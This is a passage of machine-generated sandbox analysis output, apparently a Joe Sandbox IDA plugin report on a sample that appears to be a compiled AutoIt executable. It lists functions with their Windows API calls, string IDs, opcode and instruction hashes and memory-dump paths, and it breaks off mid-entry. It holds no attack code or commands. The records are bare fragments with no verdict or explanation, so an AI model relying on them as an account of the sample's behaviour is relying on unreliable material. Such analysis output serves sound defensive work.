                                                                        • Opcode Fuzzy Hash: e016a2139a55d386669740b9f994e3347ba3bc35fd91b13a6604da0d71cf91a1
                                                                        • Instruction Fuzzy Hash: D841F774E013099FDB14CF69C980BDA7BB9FB08311F14016AEE05AB341D770A945CF95
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00945190
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009451C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |
                                                                        • API String ID: 1413715105-2343686810
                                                                        • Opcode ID: 3eb9f7a8dcdc38e2b9bfb8656a4918522268bcdc1284428cb4c0aaebd7f231f2
                                                                        • Instruction ID: a1422d2d3bcbcfa8596673c5ab0743c1f29c11d449b31831e07ff92fdd86cb9a
                                                                        • Opcode Fuzzy Hash: 3eb9f7a8dcdc38e2b9bfb8656a4918522268bcdc1284428cb4c0aaebd7f231f2
                                                                        • Instruction Fuzzy Hash: 41313971C0011DABCF01AFE4CD85EEE7FB9FF58710F000115F915A6166EA71AA56CBA1
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0095980E
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0095984A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        • Opcode ID: 15edfe942d1653a3b282dc5282b278e66d489bf3259fd9c1640103e0dcd711ea
                                                                        • Instruction ID: eb8054cb957e4c62364fbc4ac9dbe805004d92ff0f36ceb711e78766017a95a7
                                                                        • Opcode Fuzzy Hash: 15edfe942d1653a3b282dc5282b278e66d489bf3259fd9c1640103e0dcd711ea
                                                                        • Instruction Fuzzy Hash: 4E316971110604AEEB10DF69CC80BBB73BDFF99765F00861AF9A9C7190CA31AC85DB60
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009351C6
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00935201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 4daebf9972f2389736540afb826771d2c2fc4c6f3bfd38f23eb12c0373471c8f
                                                                        • Instruction ID: d5e91074796e7d77e7be5bff21a75235ef6770cea0d6c0f3fe87c6e5f70eb27c
                                                                        • Opcode Fuzzy Hash: 4daebf9972f2389736540afb826771d2c2fc4c6f3bfd38f23eb12c0373471c8f
                                                                        • Instruction Fuzzy Hash: 4531B471A00704DFEB24CF99D845BAFBBF8FF89350F164419E9A5A61A0E7709A44CF50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __snwprintf
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 2391506597-2584243854
                                                                        • Opcode ID: bee3d3f7b977b050a9e81892574b0e49d52fd9ffc3bbfd20716ed690590fecb8
                                                                        • Instruction ID: 2d418918d368561397da5e80cf2048fe8ff09e02996b3cb30ac36ebd36f7e9c5
                                                                        • Opcode Fuzzy Hash: bee3d3f7b977b050a9e81892574b0e49d52fd9ffc3bbfd20716ed690590fecb8
                                                                        • Instruction Fuzzy Hash: 75216F71600219ABCF10EF68C882FAD77B5FF86744F114469F605EB181DB70EA45CBA6
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0095945C
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00959467
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 026e9bf88e657afb0ad7cd07b4d79bd395c7331c5f8db1dabd1cb20ed7d33da3
                                                                        • Instruction ID: c86e4544768f6239ac50f5fac9807c36f25371061d1e65b49819edde1f8787dd
                                                                        • Opcode Fuzzy Hash: 026e9bf88e657afb0ad7cd07b4d79bd395c7331c5f8db1dabd1cb20ed7d33da3
                                                                        • Instruction Fuzzy Hash: F0119DB1210218AFFF25DF55DC80EBB376FEB883A5F100125FD189B2A0D6719C5697A0
                                                                        APIs
                                                                          • Part of subcall function 0090D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                          • Part of subcall function 0090D17C: GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                          • Part of subcall function 0090D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00959968
                                                                        • GetSysColor.USER32(00000012), ref: 00959982
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        • Opcode ID: f6c5ef11f76b496bab8c44e459c98754994b84d3ef96a423461f2956ac2c4da8
                                                                        • Instruction ID: aa331ad97c5ea68ffb07a44eef51a8ee8cedcd67596de62fa087fb6098e3618f
                                                                        • Opcode Fuzzy Hash: f6c5ef11f76b496bab8c44e459c98754994b84d3ef96a423461f2956ac2c4da8
                                                                        • Instruction Fuzzy Hash: C6112672520209AFDB04DFB8CC45AEA7BB8FF48355F014628FD55E2250E735E854DB60
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00959699
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009596A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: fc65d474754cddf3c6b7c3f25ff0dad13edc1bccea6e4bf928a338f25bc8f47e
                                                                        • Instruction ID: fdbfaabaff02434c3d83e70db26700232bf1874d468bd1a22dca87214c952390
                                                                        • Opcode Fuzzy Hash: fc65d474754cddf3c6b7c3f25ff0dad13edc1bccea6e4bf928a338f25bc8f47e
                                                                        • Instruction Fuzzy Hash: B1118871112108EAFB109EA9DC80AAB3B6EEB05379F500714FD25971E0C7359C98AB60
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009352D5
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009352F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 90917f303809a93361fe978fd83e1aa3fd405fa5c7fabb56d77ddfa210febc0e
                                                                        • Instruction ID: 9ffbbd44cbd4fecdc940bdbc3ab030a2b426a4a49b573b2f5c18d88f977d7ea4
                                                                        • Opcode Fuzzy Hash: 90917f303809a93361fe978fd83e1aa3fd405fa5c7fabb56d77ddfa210febc0e
                                                                        • Instruction Fuzzy Hash: 6211EF72A01614EBDB20DB98D944B9E77FCAB097A0F160125E912E72A0D3B0ED04CFA0
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00944DF5
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00944E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        • Opcode ID: 779478b13e3a155e04abc09cfd486a08b3942833f93ffecbad0838531708a85d
                                                                        • Instruction ID: a51634d2c9082941710f395d044965d692f4b3d12b921804325898a845adc7b7
                                                                        • Opcode Fuzzy Hash: 779478b13e3a155e04abc09cfd486a08b3942833f93ffecbad0838531708a85d
                                                                        • Instruction Fuzzy Hash: A4117CB1901221FBDB298F61CC89FFBFAACFF16755F10862AF51596180D3746980D6E0
                                                                        APIs
                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0094A84E
                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 0094A88B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        • Opcode ID: d9dc269c45a7a94b52d172121a7b6f985146c18e839052230d74cfa1ba1e6981
                                                                        • Instruction ID: 536822f72fe4e13e406ee27ad39b79fd720c5254c7efc7d07e649c19f4982d91
                                                                        • Opcode Fuzzy Hash: d9dc269c45a7a94b52d172121a7b6f985146c18e839052230d74cfa1ba1e6981
                                                                        • Instruction Fuzzy Hash: D001F579240304ABCB20DF68C886FADB368FF45720F108526F616AB3D1D771E801C752
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0092B7EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 0a72370e49fc50b80067908561eddcef12888b5a6fcbca0928e70aece6e2d28f
                                                                        • Instruction ID: 9d05f1cf267121a87a5d4a4984f22be0259324bff16119f0749217e4a2ca05e1
                                                                        • Opcode Fuzzy Hash: 0a72370e49fc50b80067908561eddcef12888b5a6fcbca0928e70aece6e2d28f
                                                                        • Instruction Fuzzy Hash: 4401247160112CABCB04EBB8DC52DFE33ADFF86324B040A1CF562A32C6EB7059088790
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0092B6EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 09d378d5892d73548e5916532f54fb79424a01da478a73814d5f9b7cbcc4ea08
                                                                        • Instruction ID: 44f05a808c9cdf956a0588aa756da1fc824a3212bb23d4eeaf854d5928cba73e
                                                                        • Opcode Fuzzy Hash: 09d378d5892d73548e5916532f54fb79424a01da478a73814d5f9b7cbcc4ea08
                                                                        • Instruction Fuzzy Hash: A701627564111CABCB04EBA8DA52FFE73ACEF45354F100029B602B31D6DB945F1897B6
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0092B76C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 9a17a3dbe7b0fcf6564b35d3917a810a5fc4679decb38650d911dc9f0c91bb8e
                                                                        • Instruction ID: 330e9158f17aae1bc0617de30ac8745ad43ca7b7385980fd71dbfa16d08749cf
                                                                        • Opcode Fuzzy Hash: 9a17a3dbe7b0fcf6564b35d3917a810a5fc4679decb38650d911dc9f0c91bb8e
                                                                        • Instruction Fuzzy Hash: 5301AD76641118ABCB00EBA8EA02FFE73ECAB45344B100029B502B319ADB645F0997B6
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        • Opcode ID: a06d36860f4755f9335286942249b20d8f43c2759b9c94348727e476843806fa
                                                                        • Instruction ID: 9374a35d0388dd3948809cf7ec4b0e99dbafb8c63b87c08a16109b3c10604888
                                                                        • Opcode Fuzzy Hash: a06d36860f4755f9335286942249b20d8f43c2759b9c94348727e476843806fa
                                                                        • Instruction Fuzzy Hash: 21E0927760822877D720EAA59C0AFCBFBACAB91B64F00411AB905D3041D670AA4187D0
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0092A63F
                                                                          • Part of subcall function 009113F1: _doexit.LIBCMT ref: 009113FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: 2725ad60ab21bff903979730e5011df56fde1f5d15d1305b8d05b14eb26906e3
                                                                        • Instruction ID: 00dbad9dfde79dafc5d6bd72ee6d75f70eecea8e4c8379e17baf273da69c01ed
                                                                        • Opcode Fuzzy Hash: 2725ad60ab21bff903979730e5011df56fde1f5d15d1305b8d05b14eb26906e3
                                                                        • Instruction Fuzzy Hash: C9D05B333C532C37D21436AC7C17FD5764C9F96F55F140015BB0CD55C249D6968042DA
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 0096ACC0
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0096AEBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 510247158-3257408948
                                                                        • Opcode ID: 9fbab1805d330a7a54e047ccdf7d2ddff876f9e3a852e2d49d45736a89ae88b6
                                                                        • Instruction ID: 10567758b8c78eab471c72665534fa03f5692a7d3819f566ac9fce3c6506257e
                                                                        • Opcode Fuzzy Hash: 9fbab1805d330a7a54e047ccdf7d2ddff876f9e3a852e2d49d45736a89ae88b6
                                                                        • Instruction Fuzzy Hash: 20E06DB1C18609DFCB11DBA9D944AECF7BCAF48300F148081E053B2560CB384A84EF22
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009586A2
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009586B5
                                                                          • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: a15a4bcb94d765745fa7f01d111fb94907fa0d21f8e1bdf5bf8f806a09e144de
                                                                        • Instruction ID: 2b7d55fd5178c1a0034e104ad0cf600fc0f36d0f4e37b37a3bd3a5bfde46fcd7
                                                                        • Opcode Fuzzy Hash: a15a4bcb94d765745fa7f01d111fb94907fa0d21f8e1bdf5bf8f806a09e144de
                                                                        • Instruction Fuzzy Hash: DAD01272799318B7E27467709C0BFC67A289F85B25F100815B74DEA1D0C9E0E980DB54
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009586E2
                                                                        • PostMessageW.USER32(00000000), ref: 009586E9
                                                                          • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
